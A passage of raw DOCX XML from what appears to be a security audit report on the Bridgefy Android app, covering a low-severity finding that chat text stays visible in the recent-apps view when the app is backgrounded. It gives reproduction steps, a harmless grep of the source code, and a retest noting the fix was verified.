          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>action </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"android.intent.action.MAIN" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1808" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>category </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"android.intent.category.LAUNCHER" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>intent-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250043" w:id="12"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-033</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3.0.18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(318)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to implement the proposed mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Unlike the iOS app, it was found that the Android app fails to render a security screen when it is backgrounded. This allows attackers with physical access to an unlocked device to see data displayed by the app before it disappeared into the background. A malicious app or an attacker with physical access to the device could leverage these weaknesses to gain access to user-information, such as chat messages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To replicate this issue simply navigate to some sensitive screen and then send the application to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>background.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>After</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>observe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>how</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>input text can be read by the user. This text will be readable even after a phone reboot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487599616">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2593759</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>203669</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3053462" cy="1943100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="38" name="Image 38"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="38" name="Image 38"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3053462" cy="1943100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="69"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The root cause of this issue can be seen in the Android application source code,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is currently capturing the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>onActivityPaused </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>events but it is not implementing a security screen when the application is backgrounded. This can be confirmed by searching globally for Android events in the source code provided as well as the decompiled Android APK:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>egrep -Ir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'(onActivityPause|ON_PAUSE)' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>* |egrep -v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"(androidx|google|android/support)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="6261" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="2268" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app/src/main/kotlin/me/bridgefy/main/App.kt:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun onActivityPaused(p0: Activity) {}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>render</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>going</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to the background. It is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>advised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accomplish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
